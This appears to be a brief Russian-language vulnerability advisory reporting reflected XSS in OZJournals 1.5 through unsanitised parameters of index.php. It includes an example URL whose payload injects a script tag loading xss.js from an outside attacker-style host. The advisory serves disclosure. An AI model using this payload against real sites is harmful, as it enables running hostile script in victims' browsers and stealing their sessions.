Программа: OZJournals 1.5 , возможно более ранние версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "keywords", "m" и "c" в сценарии index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://example.com/index.php?show=archives&c= http://ozjournals.awardspace.com/index.php?show= archives&c=[script%20src=http://www.youfucktard.com/xss.js][/script]



Оставить мнение